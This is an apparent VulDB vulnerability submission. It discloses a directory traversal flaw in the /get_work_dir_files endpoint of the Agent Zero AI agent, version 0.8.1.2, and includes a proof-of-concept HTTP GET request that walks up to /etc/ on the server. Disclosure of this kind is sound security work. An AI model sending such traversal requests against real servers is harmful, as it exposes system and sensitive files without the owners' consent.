| Title | frdel Agent Zero 0.8.1.2 File and Directory Information Exposure |
|---|
| Description | Agent-Zero is an AI agent project with 6.4K GitHub favorites, and its /get_work_dir_files interface has a directory traversal vulnerability, which can be used by attackers to obtain the target server architecture and sensitive information
GET /get_work_dir_files?path=../../../../../../../etc/ HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
|
|---|
| Source | ⚠️ https://github.com/frdel/agent-zero |
|---|
| User | ekkoo (UID 83509) |
|---|
| Submission | 03/30/2025 19:09 (1 Year ago) |
|---|
| Moderation | 04/13/2025 19:42 (14 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 304588 [frdel Agent-Zero 0.8.1.2 /get_work_dir_files path path traversal] |
|---|
| Points | 20 |
|---|